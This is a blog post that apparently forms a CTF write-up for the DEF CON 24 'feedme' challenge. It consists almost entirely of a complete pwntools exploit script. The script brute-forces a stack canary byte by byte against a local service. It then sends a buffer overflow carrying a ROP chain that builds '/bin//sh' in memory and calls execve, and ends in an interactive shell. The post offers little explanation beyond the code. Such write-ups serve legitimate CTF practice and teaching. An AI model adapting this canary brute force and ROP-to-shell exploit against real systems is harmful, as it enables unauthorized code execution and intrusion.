본문 바로가기
Conference/Write up

defcon24 - feedme

cheesechoi 2016. 6. 8. 17:16 

from pwn import *
import os.path
from struct import *

p = ''

p += pack('<I', 0x0806f34a) # pop edx ; ret
p += pack('<I', 0x080ea060) # @ .data
p += pack('<I', 0x080bb496) # pop eax ; ret
p += '/bin'
p += pack('<I', 0x0809a7ed) # mov dword ptr [edx], eax ; ret

p += pack('<I', 0x0806f34a) # pop edx ; ret
p += pack('<I', 0x080ea064) # @ .data + 4
p += pack('<I', 0x080bb496) # pop eax ; ret
p += '//sh'
p += pack('<I', 0x0809a7ed) # mov dword ptr [edx], eax ; ret

p += pack('<I', 0x0806f34a) # pop edx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x08054a10) # xor eax, eax ; ret
p += pack('<I', 0x0809a7ed) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x080481c9) # pop ebx ; ret
p += pack('<I', 0x080ea060) # @ .data
p += pack('<I', 0x0806f371) # pop ecx ; pop ebx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x080ea060) # padding without overwrite ebx
p += pack('<I', 0x0806f34a) # pop edx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x08054a10) # xor eax, eax ; ret
p += pack('<I', 0x080497fe) # inc eax ; ret
p += pack('<I', 0x080497fe) # inc eax ; ret
p += pack('<I', 0x080497fe) # inc eax ; ret
p += pack('<I', 0x080497fe) # inc eax ; ret
p += pack('<I', 0x080497fe) # inc eax ; ret
p += pack('<I', 0x080497fe) # inc eax ; ret
p += pack('<I', 0x080497fe) # inc eax ; ret
p += pack('<I', 0x080497fe) # inc eax ; ret
p += pack('<I', 0x080497fe) # inc eax ; ret
p += pack('<I', 0x080497fe) # inc eax ; ret
p += pack('<I', 0x080497fe) # inc eax ; ret
p += pack('<I', 0x08049761) # int 0x80

def fuck():

	conn = remote('localhost', 31337)
	print conn.recv(100)

	canary = ""
	while len(canary)<4:
		bFind = False

		for i in xrange(0x0, 0xff):
			ex = ""
			ex += "A" * 0x20
			ex += canary
			ex += chr(i)
			conn.send(chr(len(ex))+ex)
			data = conn.recvuntil('FEED ME!')

			if "YUM" in data:
				canary += chr(i)
				print canary.encode('hex')
				bFind = True
				break

		if bFind == False:
			print "[!] somethings wrong"

	print 'canary : %s'%canary.encode('hex')

	ex = ""
	ex += "S"*0x20
	ex += canary
	ex += "B"*4
	ex += "C"*4
	ex += "D"*4
	ex += p

	conn.send(chr(len(ex))+ex)
	conn.interactive()

	conn.close()


if __name__ == "__main__":

	fuck()


저작자표시 비영리

'Conference > Write up' 카테고리의 다른 글

codegate - hunting  (0) 2017.02.16
IMS-hard - RC3 CTF 2016 400pt  (0) 2016.11.21
IMS-easy - RC3 CTF 2016 150pt  (0) 2016.11.21
2014 DEFCON - sftp  (0) 2014.06.08
PCTF 2K13 ropasaurusrex  (0) 2014.04.29

'Conference/Write up' Related Articles

티스토리툴바